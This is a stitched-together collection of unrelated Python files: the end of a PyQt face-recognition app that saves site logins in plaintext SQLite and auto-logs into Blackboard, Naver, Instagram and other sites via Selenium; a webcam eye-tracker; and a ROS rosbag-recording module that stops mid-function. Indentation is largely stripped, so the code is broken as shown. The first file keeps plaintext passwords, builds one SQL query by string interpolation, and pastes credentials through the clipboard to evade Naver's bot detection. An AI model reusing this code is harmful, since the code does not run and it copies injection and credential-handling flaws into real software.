widgets.btn_bookmark.setStyleSheet(UIFunctions.selectMenu(widgets.btn_bookmark.styleSheet()))
elif btnName.find('edit') != -1:
btnNumber = number
print(btnNumber)
widgets.stackedWidget.setCurrentWidget(widgets.pageinfo)
UIFunctions.resetStyle(self, btnName)
elif btnName.find('del') != -1:
            curs.execute('SELECT * FROM student WHERE name = ?',
                         (f'{selected_name}{number}',))
            rows = curs.fetchall()
            if len(rows[0][1]):
                # Parameterized queries keep quotes in names from breaking the SQL
                curs.execute('UPDATE student SET ID="", PW="" WHERE name = ?',
                             (f'{selected_name}{number}',))
QMessageBox.about(self, "성공!", "삭제하였습니다.")
else:
QMessageBox.about(self, "오류!", "존재하지않는 정보입니다.")
conn.commit()
# SHOW WIDGETS PAGE
elif btnName == "btn_bookmark":
if selected_name == '':
running = True
th = threading.Thread(target=self.run)
th.daemon = True
th.start()
QMessageBox.about(self, "실패!", "로그인이 필요합니다.")
else:
widgets.stackedWidget.setCurrentWidget(widgets.bookmark)
UIFunctions.resetStyle(self, btnName)
btn.setStyleSheet(UIFunctions.selectMenu(btn.styleSheet()))
logined = 1
# AUTO LOGIN
def link_bookmark(self):
btn = self.sender()
btnName = btn.objectName()
number = int(btnName[-1])
print(selected_name)
        # URL to perform automated login for.
curs.execute(f'SELECT * FROM student WHERE name = "{selected_name}{number}"')
rows = curs.fetchall()
try:
if len(rows[0][1]):
for (name, ID, PW, url) in rows:
self.autologin(ID, PW, url)
else:
QMessageBox.about(self, "오류!", "수정 버튼을 눌러 등록해주세요!")
        except IndexError:
QMessageBox.about(self, "오류!", "수정 버튼을 눌러 등록해주세요!")
def edit_bookmark(self):
btn = self.sender()
btnName = btn.objectName()
print(selected_name+str(btnNumber))
        if len(widgets.adduserName_2.text()) and len(widgets.adduserName_3.text()):
            # Parameterized query so IDs/passwords containing quotes don't break the SQL
            curs.execute('UPDATE student SET ID=?, PW=? WHERE name = ?',
                         (widgets.adduserName_2.text(), widgets.adduserName_3.text(),
                          f'{selected_name}{btnNumber}'))
conn.commit()
widgets.stackedWidget.setCurrentWidget(widgets.bookmark)
UIFunctions.resetStyle(self, btnName)
btn.setStyleSheet(UIFunctions.selectMenu(btn.styleSheet()))
else:
QMessageBox.about(self, "오류!", "빈칸 없이 작성해주세요!")
# AUTO LOGIN EVENTS
def autologin(self, ID, PW, url):
driver = webdriver.Chrome('c:/informs/chromedriver.exe')
driver.implicitly_wait(3)
driver.get(url)
id = ID
pw = PW
# CBNU Blackboard
if url == "https://cbnu.blackboard.com/":
driver.find_element_by_name('uid').send_keys(id)
time.sleep(1)
driver.find_element_by_name('pswd').send_keys(pw)
time.sleep(1)
driver.find_element_by_xpath('//*[@id="entry-login"]').click()
        # CBNU Gaesinnuri portal
if url == "https://eis.cbnu.ac.kr/cbnuLogin":
time.sleep(1)
driver.find_element_by_name('uid').send_keys(id)
time.sleep(1)
driver.find_element_by_name('pswd').send_keys(pw)
time.sleep(1)
driver.find_element_by_xpath('//*[@id="commonLoginBtn"]').click()
# Daum
        # Choose login type: Kakao account OR Daum account
if url == "https://www.daum.net/":
driver.get("https://logins.daum.net/accounts/ksso.do?url=https%3A%2F%2Fwww.daum.net%2F")
driver.find_element_by_name('email').send_keys(id)
time.sleep(1)
driver.find_element_by_name('password').send_keys(pw)
driver.find_element_by_class_name('btn_g').click()
        # Instagram
if url == "https://www.instagram.com/":
driver.find_element_by_name('username').send_keys(id)
            time.sleep(2)
driver.find_element_by_name('password').send_keys(pw)
time.sleep(1)
driver.find_element_by_class_name('Igw0E').click()
# Naver
if url == "https://www.naver.com/":
time.sleep(1)
driver.get('https://nid.naver.com/nidlogin.login?mode=form&url=https%3A%2F%2Fwww.naver.com')
            # ID input form; credentials are pasted via the clipboard because
            # Naver blocks plain send_keys typing as bot activity.
tag_id = driver.find_element_by_name('id')
tag_pw = driver.find_element_by_name('pw')
tag_id.click()
pyperclip.copy(id)
tag_id.send_keys(Keys.CONTROL, 'v')
time.sleep(1)
tag_pw.click()
pyperclip.copy(pw)
tag_pw.send_keys(Keys.CONTROL, 'v')
time.sleep(1)
driver.find_element_by_id('log.login').click()
time.sleep(2)
# Everytime
if url == "https://everytime.kr/":
time.sleep(1)
driver.get("https://everytime.kr/login")
driver.find_element_by_name('userid').send_keys(id)
time.sleep(1)
driver.find_element_by_name('password').send_keys(pw)
time.sleep(1)
driver.find_element_by_class_name('submit').click()
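        # NOTE (added for illustration): the find_element_by_* calls throughout this
        # method use the Selenium 3 API; under Selenium 4 they would be written as
        # driver.find_element(By.NAME, ...) with
        # `from selenium.webdriver.common.by import By`.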
# RESIZE EVENTS
# ///////////////////////////////////////////////////////////////
def resizeEvent(self, event):
# Update Size Grips
UIFunctions.resize_grips(self)
# MOUSE CLICK EVENTS
# ///////////////////////////////////////////////////////////////
def mousePressEvent(self, event):
# SET DRAG POS WINDOW
global face_locations
global face_names
global selected_encoding
global selected_name
self.dragPos = event.globalPos()
# PRINT MOUSE EVENTS
if event.buttons() == Qt.LeftButton:
print('Mouse click: LEFT CLICK')
if event.buttons() == Qt.RightButton:
print('Mouse click: RIGHT CLICK')
if running:
x = event.x() - widgets.camLabel.x() - widgets.leftMenuBg.width()
y = event.y() - widgets.camLabel.y() - widgets.contentTopBg.height()
for (top, right, bottom, left), name, encoding in zip(face_locations, face_names, face_encodings):
# top *= 2
# right *= 2
# bottom *= 2
# left *= 2
if (right >= x >= left) and (bottom >= y >= top):
print(name)
selected_name = name
slicedImg = captured_img[top:bottom, left:right]
slicedImg = cv2.cvtColor(slicedImg, cv2.COLOR_BGR2RGB)
h, w, c = slicedImg.shape
qImg = QImage(slicedImg.data, w, h, w * c, QImage.Format_RGB888)
pixmap = QPixmap.fromImage(qImg)
widgets.slicedPicture.setPixmap(pixmap)
widgets.selectedId.setText(QCoreApplication.translate("MainWindow", name, None))
selected_encoding = encoding
if name == "Unknown":
                        widgets.function_text.setText(QCoreApplication.translate("MainWindow", "Sign up", None))
else:
                        widgets.function_text.setText(QCoreApplication.translate("MainWindow", "Log in", None))
if __name__ == "__main__":
    with sqlite3.connect('school.db') as conn:
        curs = conn.cursor()
        curs.execute('''CREATE TABLE IF NOT EXISTS student
                    (name VARCHAR(20) PRIMARY KEY, ID VARCHAR(20), PW VARCHAR(20), url VARCHAR(100))''')
        app = QApplication(sys.argv)
        app.setWindowIcon(QIcon("icon.ico"))
        window = MainWindow()
        # Run the event loop to completion first; in the original, commit/close
        # sat after sys.exit() and were unreachable.
        exit_code = app.exec()
        conn.commit()
    conn.close()
    sys.exit(exit_code)
|
eye_tracker.py
|
"""
@title
@description
"""
import os
import threading
import time
import cv2
import dlib
import numpy as np
from auto_drone import DATA_DIR
def shape_to_np(shape, dtype='int'):
coords = np.zeros((68, 2), dtype=dtype)
for i in range(0, 68):
coords[i] = (shape.part(i).x, shape.part(i).y)
return coords
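# Hedged usage sketch (added for illustration, not part of the original module):
# shape_to_np pairs with dlib's detector/predictor, e.g.
#
#     rects = detector(gray_frame, 1)
#     landmarks = shape_to_np(predictor(gray_frame, rects[0]))  # -> (68, 2) int array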
class EyeTracker:
FRAME_DELAY = 1
def __init__(self, log_dir: str, log_id=None, callback_list=None):
self.history = []
self.callback_list = callback_list if callback_list is not None else []
self.listen_thread = None
self.listening = False
self.webcam_index = 0
self.video_capture = cv2.VideoCapture(self.webcam_index)
self.detector = dlib.get_frontal_face_detector()
self.predictor = dlib.shape_predictor(
os.path.join(DATA_DIR, 'eye_tracking', 'shape_predictor_68_face_landmarks.dat')
)
self.video_writer = None
self.video_start_time = None
self.video_end_time = None
start_time = time.time()
if not os.path.isdir(log_dir):
os.makedirs(log_dir)
if log_id:
self.log_fname = os.path.join(log_dir, f'log_{log_id}_{start_time}.txt')
self.video_fname = os.path.join(log_dir, f'video_{log_id}_{start_time}.avi')
else:
self.log_fname = os.path.join(log_dir, f'log_{start_time}.txt')
self.video_fname = os.path.join(log_dir, f'video_{start_time}.avi')
return
def start_listener(self):
self.listen_thread = threading.Thread(target=self.__listen, daemon=True)
self.listen_thread.start()
return
def __listen(self):
if not self.video_capture.isOpened():
            print('Could not open video stream')
return
print(f'Opened video stream: {self.webcam_index}')
# discard first read and make sure all is reading correctly
read_success, video_frame = self.video_capture.read()
if not read_success:
            print('Error reading from video stream')
return
calibration_frame_count = 120
calibration_start = time.time()
for frame_idx in range(0, calibration_frame_count):
_, _ = self.video_capture.read()
calibration_end = time.time()
# save capture width and height for later when saving the video
fps = int(calibration_frame_count / (calibration_end - calibration_start))
frame_width = int(self.video_capture.get(3))
frame_height = int(self.video_capture.get(4))
print(f'Read frame from video stream\n'
f'FPS: {fps}\n'
f'Width: {frame_width}\n'
f'Height: {frame_height}')
codec_str = 'MJPG'
self.video_writer = cv2.VideoWriter(
self.video_fname, cv2.VideoWriter_fourcc(*codec_str),
fps, (frame_width, frame_height)
)
self.listening = True
self.video_start_time = time.time()
while self.listening:
ret, img = self.video_capture.read()
if ret:
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
rects = self.detector(gray, 1)
for (i, rect) in enumerate(rects):
shape = self.predictor(gray, rect)
shape = shape_to_np(shape)
for (x, y) in shape:
cv2.circle(img, (x, y), 2, (0, 0, 255), -1)
self.video_writer.write(img.astype('uint8'))
cv2.imshow('EyeTracker', img)
cv2.waitKey(self.FRAME_DELAY)
self.history.append(img)
                # TODO: save to video
read_time = time.time()
for each_callback in self.callback_list:
if callable(each_callback):
each_callback({'timestamp': read_time, 'data': img})
self.video_end_time = time.time()
cv2.destroyAllWindows()
self.video_capture.release()
return
def stop_listener(self):
self.listening = False
return
    def cleanup(self):
        self.stop_listener()
        # Guard against cleanup() being called before start_listener().
        if self.listen_thread is not None:
            self.listen_thread.join()
        return
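if __name__ == '__main__':
    # Minimal usage sketch (added for illustration, not in the original module).
    # Assumes a working default webcam and the dlib landmark model under
    # DATA_DIR/eye_tracking/.
    tracker = EyeTracker(log_dir='logs', log_id='demo')
    tracker.start_listener()
    time.sleep(10)  # record for roughly ten seconds
    tracker.cleanup()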
|
rosbag_api_recording_1_generate_output.py
|
#!/usr/bin/env python
import roslib
import rospy
import smach
import smach_ros
from geometry_msgs.msg import Point
from geometry_msgs.msg import Point32
from geometry_msgs.msg import PointStamped
from geometry_msgs.msg import Pose
from geometry_msgs.msg import PoseStamped
from geometry_msgs.msg import Quaternion
from geometry_msgs.msg import PoseArray
from sensor_msgs.msg import PointCloud
from sensor_msgs import point_cloud2 as pc2
from sensor_msgs.msg import PointCloud2
from sensor_msgs.point_cloud2 import create_cloud_xyz32
import threading
import rosbag
import rosgraph
try:
from queue import Queue
except ImportError:
from Queue import Queue
def parse_pointstamped(point_input):
"""
Parse point_input into PointStamped.
"""
try:
assert isinstance(point_input, PointStamped)
return point_input
except:
pass
try:
assert isinstance(point_input, Point)
point = PointStamped(point = point_input)
point.header.stamp = rospy.Time.now()
return point
except:
pass
try:
assert isinstance(point_input, Point32)
point = PointStamped(point = Point(x=point_input.x, y=point_input.y, z=point_input.z))
point.header.stamp = rospy.Time.now()
return point
except:
pass
try:
point = point_input
point = PointStamped(point = Point(x=point[0], y=point[1], z=point[2]))
point.header.stamp = rospy.Time.now()
return point
except Exception as e:
raise ValueError('Point not properly specified (should be Point, PointStamped or [3] list type)!')
def parse_posestamped(pose_input):
"""
Parse pose_input into PoseStamped.
"""
try:
assert isinstance(pose_input, PoseStamped)
return pose_input
except:
pass
try:
assert isinstance(pose_input, Pose)
pose = PoseStamped(pose = pose_input)
pose.header.stamp = rospy.Time.now()
return pose
except:
pass
try:
pose = pose_input
position = Point(x=pose_input[0][0], y=pose_input[0][1], z=pose_input[0][2])
orientation = Quaternion(x=pose_input[1][0], y=pose_input[1][1], z=pose_input[1][2], w=pose_input[1][3])
pose = PoseStamped(pose = Pose(position=position, orientation=orientation))
pose.header.stamp = rospy.Time.now()
return pose
except Exception as e:
raise ValueError('Pose not properly specified (should be Pose, PoseStamped or [[3],[4]] list)!')
def parse_posearray(posearray_input):
"""
Parse posearray_input into a PoseArray.
"""
try:
assert isinstance(posearray_input, PoseArray)
return posearray_input
except:
pass
try:
assert isinstance(posearray_input, list)
posearray = PoseArray()
for pose in posearray_input:
try:
assert isinstance(pose, Pose)
posearray.poses.append(pose)
continue
except:
pass
try:
assert isinstance(pose, PoseStamped)
posearray.poses.append(pose.pose)
continue
except:
pass
try:
position = Point(x=pose[0][0], y=pose[0][1], z=pose[0][2])
orientation = Quaternion(x=pose[1][0], y=pose[1][1], z=pose[1][2], w=pose[1][3])
pose = Pose(position=position, orientation=orientation)
posearray.poses.append(pose)
continue
except Exception as e:
raise ValueError('Pose in pose array input not properly specified (should be Pose, PoseStamped or [[3],[4]] list)!')
posearray.header.stamp = rospy.Time.now()
return posearray
except Exception as e:
raise ValueError('Pose array not properly specified (should be PoseArray or list of Pose, PoseStamped or [[3],[4]] list types)!')
def parse_pointcloud(pointcloud_input):
"""
Parse pointcloud_input into PointCloud.
"""
try:
assert isinstance(pointcloud_input, PointCloud)
return pointcloud_input
except:
pass
try:
points = pc2.read_points(pointcloud_input, skip_nans=True, field_names=('x', 'y', 'z'))
        return PointCloud(points=[Point32(*point) for point in points])
except Exception as e:
raise ValueError('Point cloud not properly specified (should be PointCloud or PointCloud2 type): ' + repr(e))
def parse_pointcloud2(pointcloud_input):
"""
Parse pointcloud_input into PointCloud2.
"""
try:
assert isinstance(pointcloud_input, PointCloud2)
return pointcloud_input
except:
pass
try:
points = [[point.x, point.y, point.z] for point in pointcloud_input.points]
pointcloud2 = create_cloud_xyz32(header=pointcloud_input.header, points=points)
return pointcloud2
except:
raise ValueError('Point cloud not properly specified (should be PointCloud or PointCloud2 type)!')
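def _demo_parsers():
    # Hedged usage sketch (added for illustration): the parse_* helpers above
    # normalize several input forms. Assumes rospy.init_node() has been called,
    # since the parsers stamp headers with rospy.Time.now().
    point = parse_pointstamped([1.0, 2.0, 3.0])                        # list -> PointStamped
    pose = parse_posestamped([[0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 1.0]])  # nested lists -> PoseStamped
    posearray = parse_posearray([pose, pose.pose])                     # mixed inputs -> PoseArray
    return point, pose, posearray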
class MsgPublisher(object):
"""
"""
def __init__(self):
# A dict of message publishers indexed by topic
self._pubs = dict()
# A dict of messages indexed by topic
self._msgs = dict()
# A dict of callbacks indexed by topic
self._callbacks = dict()
# A dict of message publication rates indexed by topic
self._pub_rates = dict()
# A dict of message publisher threads indexed by topic
self._pub_threads = dict()
# A dict of message publisher stop flags indexed by topic
self._stop_flags = dict()
# Length of timeout (in seconds) for waiting for the threads to finish
# publishing before forcibly unpublishing.
self._unpublish_timeout = 10.0
def _run_pub_thread(self, topic):
r = rospy.Rate(self._pub_rates[topic])
while not self._stop_flags[topic]:
# Apply callback to message
if self._callbacks[topic]:
try:
self._msgs[topic] = self._callbacks[topic](self._msgs[topic])
except Exception as e:
rospy.logerr('Error when applying callback to message being published on topic {}: {}'.format(topic, repr(e)))
# Publish message
try:
self._pubs[topic].publish(self._msgs[topic])
except Exception as e:
rospy.logerr('Error while publishing to topic {}: {}'.format(topic, repr(e)))
r.sleep()
self._unpublish(topic)
def _unpublish(self, topic):
try:
self._pubs[topic].unregister()
except Exception as e:
rospy.logerr('Failed to unregister publisher of topic {}: {}'.format(topic, repr(e)))
raise
del self._pubs[topic]
del self._msgs[topic]
del self._callbacks[topic]
del self._pub_rates[topic]
def start(self, msg, topic, rate, frame_id=None, callback=None):
# Set the message publisher stopping flag
self._stop_flags[topic] = False
# Save the message
self._msgs[topic] = msg
# Save the message publication rate
self._pub_rates[topic] = rate
# Use frame_id if specified
if frame_id:
try:
assert(isinstance(frame_id, str))
self._msgs[topic].header.frame_id = frame_id
            except Exception as e:
                rospy.logwarn('Failed to add specified frame_id {} to message for publication on topic {}: {}'.format(frame_id, topic, repr(e)))
# Use callback if specified
if callback:
try:
assert(callable(callback))
self._callbacks[topic] = callback
            except Exception as e:
                rospy.logwarn('Failed to add specified callback {} to publisher of topic {}: {}'.format(callback, topic, repr(e)))
                self._callbacks[topic] = None
else:
self._callbacks[topic] = None
# Add publisher
try:
self._pubs[topic] = rospy.Publisher(topic, type(self._msgs[topic]))
except Exception as e:
del self._pub_rates[topic]
            del self._msgs[topic]
rospy.logwarn('Failed to add publisher for topic {}: {}'.format(topic, repr(e)))
return 'aborted'
# Spin up the message publication thread
self._pub_threads[topic] = threading.Thread(target=self._run_pub_thread, args=[topic])
self._pub_threads[topic].start()
return 'succeeded'
def stop(self, topic):
# Signal thread to stop publishing
self._stop_flags[topic] = True
# Wait for the topic to be unpublished
t = rospy.get_time()
r = rospy.Rate(self._pub_rates[topic])
while topic in list(self._pubs.keys()):
if rospy.get_time() - t < self._unpublish_timeout:
r.sleep()
else:
break
else:
return 'succeeded'
# If the publisher is still running, issue a warning and attempt forced unpublish.
rospy.logwarn('Warning: timeout exceeded for stopping publisher thread for topic {}. Attempting forced stop...'.format(topic))
try:
self._unpublish(topic)
except Exception as e:
rospy.logerr('Error during forced stop of publisher of topic {}: {}'.format(topic, repr(e)))
return 'aborted'
return 'succeeded'
def stop_all(self):
# Stop all current publishers
for topic in self._pubs.keys():
if self.stop(topic) != 'succeeded':
return 'aborted'
return 'succeeded'
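def _demo_msg_publisher():
    # Hedged usage sketch (added for illustration): the start/stop lifecycle of
    # MsgPublisher. Assumes a running ROS master and an initialized node; the
    # topic name is hypothetical.
    publisher = MsgPublisher()
    msg = PointStamped(point=Point(x=1.0, y=2.0, z=3.0))
    msg.header.stamp = rospy.Time.now()
    publisher.start(msg, 'smacha/demo_point', 10.0)  # publish at 10 Hz
    rospy.sleep(2.0)
    publisher.stop('smacha/demo_point')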
class PublishMsgState(smach.State):
def __init__(self, name, msg_publisher, action, input_keys = ['msg', 'topic', 'rate'], output_keys = ['msg', 'topic'], callbacks = None):
smach.State.__init__(self, input_keys=input_keys, output_keys=output_keys, outcomes=['succeeded', 'aborted'])
# Save the state name
self._name = name
# Save the MsgPublisherObserver object reference
self._msg_publisher = msg_publisher
# Save the action
self._action = action
# Set up dict of parsing functions for certain message types/classes.
self._msg_parsers = {"<class 'geometry_msgs.msg._Point.Point'>": parse_pointstamped,
"<class 'geometry_msgs.msg._PointStamped.PointStamped'>": parse_pointstamped,
"<class 'geometry_msgs.msg._Pose.Pose'>": parse_posestamped,
"<class 'geometry_msgs.msg._PoseStamped.PoseStamped'>": parse_posestamped,
"<class 'geometry_msgs.msg._PoseArray.PoseArray'>": parse_posearray,
"<class 'sensor_msgs.msg._PointCloud.PointCloud'>": parse_pointcloud,
"<class 'sensor_msgs.msg._PointCloud2.PointCloud2'>": parse_pointcloud2}
self._cbs = []
if callbacks:
for cb in sorted(callbacks):
if cb in globals():
self._cbs.append(globals()[cb])
elif cb in locals():
self._cbs.append(locals()[cb])
elif cb in dir(self):
self._cbs.append(getattr(self, cb))
self._cb_input_keys = []
self._cb_output_keys = []
self._cb_outcomes = []
for cb in self._cbs:
if cb and smach.has_smach_interface(cb):
self._cb_input_keys.append(cb.get_registered_input_keys())
self._cb_output_keys.append(cb.get_registered_output_keys())
self._cb_outcomes.append(cb.get_registered_outcomes())
self.register_input_keys(self._cb_input_keys[-1])
self.register_output_keys(self._cb_output_keys[-1])
self.register_outcomes(self._cb_outcomes[-1])
def _parse_msg(self, msg, msg_type=None):
# First try using a known parser for a specified msg_type.
try:
assert msg_type
msg_class = str(roslib.message.get_message_class(msg_type))
published_msg = self._msg_parsers[msg_class](msg)
return published_msg
except:
pass
# Next, try to select a known parser by checking the type of message.
try:
msg_class = str(type(msg))
published_msg = self._msg_parsers[msg_class](msg)
return published_msg
except:
pass
# Next, try each message type parser in succession and see if something sticks.
for _, parser in self._msg_parsers.items():
try:
published_msg = parser(msg)
return published_msg
except:
pass
# Finally, if none of the above stuck, just return the original message.
return msg
def execute(self, userdata):
# Call callbacks
for (cb, ik, ok) in zip(self._cbs,
self._cb_input_keys,
self._cb_output_keys):
# Call callback with limited userdata
try:
cb_outcome = cb(self, smach.Remapper(userdata,ik,ok,{}))
except:
cb_outcome = cb(smach.Remapper(userdata,ik,ok,{}))
# Start or stop the message publisher
outcome = 'aborted'
if self._action == 'start':
# Parse msg
try:
if 'msg_type' in self._input_keys:
published_msg = self._parse_msg(userdata.msg, msg_type=userdata.msg_type)
else:
published_msg = self._parse_msg(userdata.msg)
except Exception as e:
                rospy.logerr('Failed to parse message: {}'.format(repr(e)))
return 'aborted'
# Get topic if it's specified as an input key
if 'topic' in self._input_keys:
topic = userdata.topic
# Otherwise, construct it from the state name
else:
topic = 'smacha/' + self._name.lower()
# Get rate if it's specified as an input key
if 'rate' in self._input_keys:
rate = userdata.rate
else:
rate = 100.0
# Get callback if it's specified as an input key
if 'callback' in self._input_keys:
callback = userdata.callback
else:
callback = ''
# Get frame_id if it's specified as an input key
if 'frame_id' in self._input_keys:
frame_id = userdata.frame_id
else:
frame_id = ''
# Start the publisher
outcome = self._msg_publisher.start(published_msg, topic, rate, frame_id=frame_id, callback=callback)
elif self._action == 'stop':
            # 'topic' is only bound in the 'start' branch, so read it from userdata here.
            outcome = self._msg_publisher.stop(userdata.topic)
elif self._action == 'stop_all':
outcome = self._msg_publisher.stop_all()
# Set topic output key if specified
if self._action == 'start' and outcome == 'succeeded':
for output_key in ['topic', 'output_topic', 'topic_output']:
if output_key in self._output_keys:
setattr(userdata, output_key, topic)
# Set msg output key if specified
if self._action == 'start' and outcome == 'succeeded':
for output_key in ['msg', 'output_msg', 'msg_output']:
if output_key in self._output_keys:
setattr(userdata, output_key, published_msg)
return outcome
class ROSBagAPIThreadRecorder(object):
"""A rosbag recorder class that uses the rosbag API (application
programming interface) as well as the threading library in order to manage
multiple recording threads. NOTE: this means that this recorder may have
issues with the Python GIL (global interpreter lock) when other threads (e.g.
MoveIt! commands) block execution.
"""
def __init__(self):
# Get a reference to the ROS master
self._master = rosgraph.Master('rosbag_recorder_observer')
# A dict of bag master check threads indexed by bag filenames
self._master_check_threads = dict()
# The rate at which to poll the ROS master for new topics
self._master_check_interval = 0.1
# A dict of rosbags indexed by filenames
self._bags = dict()
# A dict of bag writing threads indexed by bag filenames
self._write_threads = dict()
# A dict of bag writing queues indexed by bag filenames
self._write_queues = dict()
# A dict of bag writing stop flags indexed by bag filenames
self._stop_flags = dict()
# A dict of bag thread stop conditions indexed by bag filenames
self._stop_conditions = dict()
# A dict of bag file locks indexed by bag filenames
self._bag_locks = dict()
# A dict of dicts of subscribers indexed by bag_files and topics
# respectively
self._bag_subs = dict()
# Length of timeout (in seconds), as well as sleep rate, for waiting
# for the threads to finish writing before forcibly closing a bag.
self._bag_close_timeout = 10.0
self._bag_close_sleep_rate = 100.0
def _write_cb(self, msg, args):
bag_file = args[0]
topic = args[1]
msg_class = args[2]
try:
self._write_queues[bag_file].put((topic, msg, rospy.get_rostime()))
except Exception as e:
rospy.logwarn('Failed to write message of type {} from topic {} to rosbag {}: {}'.format(msg_class, topic, bag_file, repr(e)))
pass
def _run_master_check_thread(self, bag_file, topics):
# Set up an observer loop
try:
while not self._stop_flags[bag_file]:
# Get a list of topics currently being published
currently_published_topics = []
try:
currently_published_topics = self._master.getPublishedTopics('')
except Exception as e:
# TODO: Allow this warning to be included if a
# debug/verbosity flag is passed to the state.
# rospy.logwarn('Failed to get list of currently published topics from ROS master: {}'.format(repr(e)))
pass
# Check for new topics
for topic, msg_type in currently_published_topics:
# If the topic has previously been subscribed to for this
# bag_file, or is not listed as a topic for this bag_file,
# skip it.
if topic in list(self._bag_subs[bag_file].keys()) or (topic not in topics and topic.strip('/') not in topics):
continue
# Subscribe to the topic
try:
msg_class = roslib.message.get_message_class(msg_type)
self._bag_subs[bag_file][topic] = rospy.Subscriber(topic, msg_class, self._write_cb, (bag_file, topic, msg_class))
except Exception as e:
self._unsubscribe_bag_topics(bag_file)
self._close_bag(bag_file)
raise ValueError('Failed to subscribe to topic {}: {}'.format(topic, repr(e)))
# Wait a while
self._stop_conditions[bag_file].acquire()
self._stop_conditions[bag_file].wait(self._master_check_interval)
except Exception as e:
rospy.logerr('Error when recording rosbag file {}: {}'.format(bag_file, repr(e)))
# Unsubscribe from topics and close bag
self._unsubscribe_bag_topics(bag_file)
self._close_bag(bag_file)
def _unsubscribe_bag_topics(self, bag_file):
for _, sub in self._bag_subs[bag_file].items():
try:
sub.unregister()
except Exception as e:
rospy.logerr('Failed to unregister topic subscriber {} while stopping rosbag recording with filename \'{}\': {}'.format(sub, bag_file, repr(e)))
raise
del self._bag_subs[bag_file]
def _close_bag(self, bag_file):
try:
with self._bag_locks[bag_file]:
self._bags[bag_file].close()
except Exception as e:
rospy.logerr('Failed to close rosbag with filename \'{}\': {}'.format(bag_file, repr(e)))
raise
del self._bags[bag_file]
def _run_write_thread(self, bag_file):
try:
while not self._stop_flags[bag_file]:
# Wait for a message
item = self._write_queues[bag_file].get()
if item == self:
continue
topic, msg, t = item
# Write to the bag
with self._bag_locks[bag_file]:
self._bags[bag_file].write(topic, msg, t)
except Exception as e:
rospy.logerr('Error when writing to rosbag file {}: {}'.format(bag_file, repr(e)))
def start(self, bag_file, topics):
"""Start a rosbag recording.
"""
# Open the bag file for writing
try:
assert(bag_file not in self._bags.keys())
self._bags[bag_file] = rosbag.Bag(bag_file, 'w')
self._bag_subs[bag_file] = dict()
except Exception as e:
rospy.logerr('Failed to start rosbag recording with filename \'{}\': {}'.format(bag_file, repr(e)))
return 'aborted'
# Set up the bag writing queue
self._write_queues[bag_file] = Queue()
# Set the bag thread lock, write stopping flag, and thread stopping conditions
self._bag_locks[bag_file] = threading.Lock()
self._stop_flags[bag_file] = False
self._stop_conditions[bag_file] = threading.Condition()
# Spin up the master check and bag writing threads
self._master_check_threads[bag_file] = threading.Thread(target=self._run_master_check_thread, args=[bag_file, topics])
self._write_threads[bag_file] = threading.Thread(target=self._run_write_thread, args=[bag_file])
self._master_check_threads[bag_file].start()
self._write_threads[bag_file].start()
return 'succeeded'
def stop(self, bag_file):
"""Stop a rosbag recording.
"""
# Signal threads to stop bag recording
with self._stop_conditions[bag_file]:
self._stop_flags[bag_file] = True
self._stop_conditions[bag_file].notify_all()
# Signal the bag write thread to stop writing
self._write_queues[bag_file].put(self)
# Wait for the bag to be closed
t = rospy.get_time()
r = rospy.Rate(self._bag_close_sleep_rate)
while bag_file in list(self._bags.keys()):
if rospy.get_time() - t < self._bag_close_timeout:
r.sleep()
else:
break
else:
return 'succeeded'
# If the bag is still open, issue a warning and attempt forced closure.
rospy.logwarn('Warning: timeout exceeded for stopping writing to rosbag file {}. Attempting forced stop...'.format(bag_file))
try:
self._unsubscribe_bag_topics(bag_file)
self._close_bag(bag_file)
except Exception as e:
rospy.logerr('Error during forced stop of writing to rosbag file {}: {}'.format(bag_file, repr(e)))
return 'aborted'
return 'succeeded'
def stop_all(self):
"""Stop all rosbag recordings.
"""
# Stop all current recordings
for bag_file in list(self._bags.keys()):
if self.stop(bag_file) != 'succeeded':
return 'aborted'
return 'succeeded'
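def _demo_rosbag_recorder():
    # Hedged usage sketch (added for illustration): records any publications on
    # the listed topics into a bag for a few seconds. Assumes a running ROS
    # master and an initialized node; the file and topic names are hypothetical.
    recorder = ROSBagAPIThreadRecorder()
    recorder.start('/tmp/demo.bag', ['smacha/demo_point'])
    rospy.sleep(5.0)
    recorder.stop('/tmp/demo.bag')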
class RecordROSBagState(smach.State):
def __init__(self, name, bag_recorder, action, input_keys=['file', 'topics'], output_keys=[], callbacks = None):
smach.State.__init__(self, input_keys=input_keys, output_keys=output_keys, outcomes=['succeeded', 'aborted'])
# Save the state name
self._name = name
# Save the ROSBagRecorder object reference
        self._bag_recorder = bag_recorder
# Save the action
self._action = action
self._cbs = []
if callbacks:
for cb in sorted(callbacks):
if cb in globals():
self._cbs.append(globals()[cb])
elif cb in locals():
self._cbs.append(locals()[cb])
elif cb in dir(self):
self._cbs.append(getattr(self, cb))
self._cb_input_keys = []
self._cb_output_keys = []
self._cb_outcomes = []
for cb in self._cbs:
if cb and smach.has_smach_interface(cb):
self._cb_input_keys.append(cb.get_registered_input_keys())
self._cb_output_keys.append(cb.get_registered_output_keys())
self._cb_outcomes.append(cb.get_registered_outcomes())
self.register_input_keys(self._cb_input_keys[-1])
self.register_output_keys(self._cb_output_keys[-1])
self.register_outcomes(self._cb_outcomes[-1])
def execute(self, userdata):
# Call callbacks
for (cb, ik, ok) in zip(self._cbs,
self._cb_input_keys,
self._cb_output_keys):
# Call callback with limited userdata
try:
cb_outcome = cb(self, smach.Remapper(userdata,ik,ok,{}))
except:
cb_outcome = cb(smach.Remapper(userdata,ik,ok,{}))
# Get filename from userdata
try:
bag_file = userdata.file
assert(isinstance(bag_file, str))
except Exception as e:
rospy.logerr('The rosbag filename must be specified as a userdata input key: {}'.format(repr(e)))
return 'aborted'
# Get topic names from userdata
try:
topics = userdata.topics
            assert all(isinstance(x, str) for x in topics)
except Exception as e:
rospy.logerr('Topic names must be specified as a userdata input key: {}'.format(repr(e)))
return 'aborted'
# Start or stop recording
outcome = 'aborted'
if self._action == 'start' or self._action == 'record':
outcome = self._bag_recorder.start(bag_file, topics)
elif self._action == 'stop':
outcome = self._bag_recorder.stop(bag_file)
elif self._action == 'stop_all':
outcome = self._bag_recorder.stop_all()
return outcome
class SleepState(smach.State):
def __init__(self, time, input_keys = [], output_keys = [], callbacks = [], outcomes=['succeeded']):
smach.State.__init__(self, input_keys=input_keys, output_keys=output_keys, outcomes=outcomes)
self._time = time
def execute(self, userdata):
rospy.sleep(self._time)
return 'succeeded'
def main():
rospy.init_node('sm')
msg_publisher = MsgPublisher()
bag_recorder = ROSBagAPIThreadRecorder()
sm = smach.StateMachine(outcomes=['succeeded', 'aborted'])
    sm.userdata.point = Point()
